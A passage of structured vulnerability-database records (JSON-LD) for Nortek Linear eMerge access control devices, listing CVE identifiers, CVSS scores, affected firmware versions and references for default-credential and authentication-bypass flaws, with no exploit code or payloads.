"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34629"
},
{
"date": "2019-11-12T00:00:00",
"db": "VULHUB",
"id": "VHN-158700"
},
{
"date": "2024-03-07T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2019-005913"
},
{
"date": "2019-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-100"
},
{
"date": "2022-10-13T19:41:17.993000",
"db": "NVD",
"id": "CVE-2019-7265"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear\u00a0eMerge\u00a0E3\u00a0 Vulnerabilities related to the use of hard-coded credentials in series devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005913"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-100"
}
],
"trust": 0.6
}
}
VAR-201907-0152
Vulnerability from variot - Updated: 2023-12-18 13:52Linear eMerge E3-Series devices have Default Credentials. Linear eMerge E3 Series devices contain vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security & Control Linear eMerge E3-Series is an access control device from Nortek Security & Control, USA.
Nortek Security & Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to obtain default passwords and identify target systems connected to the network. to attack affected components
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0152",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security\u0026control linear emerge e3-series",
"scope": "lte",
"trust": 0.6,
"vendor": "nortek",
"version": "\u003c=1.00-06"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "NVD",
"id": "CVE-2019-7252"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7252"
}
]
},
"cve": "CVE-2019-7252",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7252",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34626",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158687",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7252",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7252",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34626",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-109",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158687",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "VULHUB",
"id": "VHN-158687"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices have Default Credentials. Linear eMerge E3 Series devices contain vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security \u0026 Control Linear eMerge E3-Series is an access control device from Nortek Security \u0026 Control, USA. \n\nNortek Security \u0026 Control Linear eMerge E3-Series has a trust management issue vulnerability. An attacker could use this vulnerability to obtain default passwords and identify target systems connected to the network. to attack affected components",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "VULHUB",
"id": "VHN-158687"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7252",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-109",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34626",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158687",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "VULHUB",
"id": "VHN-158687"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
]
},
"id": "VAR-201907-0152",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "VULHUB",
"id": "VHN-158687"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
}
]
},
"last_update_date": "2023-12-18T13:52:16.684000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge E3-Series Access Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-1188",
"trust": 1.0
},
{
"problemtype": "CWE-255",
"trust": 0.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158687"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "NVD",
"id": "CVE-2019-7252"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7252"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7252"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "VULHUB",
"id": "VHN-158687"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "VULHUB",
"id": "VHN-158687"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158687"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"date": "2019-07-02T19:15:10.867000",
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-10-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"date": "2020-08-24T00:00:00",
"db": "VULHUB",
"id": "VHN-158687"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005906"
},
{
"date": "2020-08-24T17:37:01.140000",
"db": "NVD",
"id": "CVE-2019-7252"
},
{
"date": "2020-08-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nortek Security \u0026 Control Linear eMerge E3-Series Trust Management Issue Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34626"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-109"
}
],
"trust": 0.6
}
}
VAR-201907-0167
Vulnerability from variot - Updated: 2023-12-18 13:23Linear eMerge 50P/5000P The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security & Control.
The Linear eMerge 50P / 5000P has an authentication bypass vulnerability. An attacker could exploit this vulnerability by sending a specially crafted HTTP request to bypass authentication checks and gain unauthorized access to the application. A security vulnerability exists in the Linear eMerge 50P/5000P device due to the validation mechanism not adequately checking the incoming data
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0167",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge 50p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge 50p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "security \u0026 control linear emerge 50p 5000p version)",
"scope": "eq",
"trust": 0.6,
"vendor": "nortek",
"version": "/\u003c=4.6.07(79330"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "NVD",
"id": "CVE-2019-7266"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_50p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7266"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sipke Mellema",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
],
"trust": 0.6
},
"cve": "CVE-2019-7266",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7266",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-34617",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-158701",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7266",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7266",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2019-34617",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-097",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158701",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "VULHUB",
"id": "VHN-158701"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "NVD",
"id": "CVE-2019-7266"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-097"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The Linear eMerge 50P / 5000P is a browser-managed access control security system from Nortek Security \u0026 Control. \n\nThe Linear eMerge 50P / 5000P has an authentication bypass vulnerability. An attacker could exploit this vulnerability by sending a specially crafted HTTP request to bypass authentication checks and gain unauthorized access to the application. A security vulnerability exists in the Linear eMerge 50P/5000P device due to the validation mechanism not adequately checking the incoming data",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "VULHUB",
"id": "VHN-158701"
}
],
"trust": 1.35
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-158701",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158701"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7266",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "155250",
"trust": 1.7
},
{
"db": "ICS CERT",
"id": "ICSA-20-184-01",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-097",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-34617",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2294",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "47293",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158701",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-34617"
},
{
"db": "VULHUB",
"id": "VHN-158701"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006014"
},
{
"db": "NVD",
"id": "CVE-2019-7266"
},
{
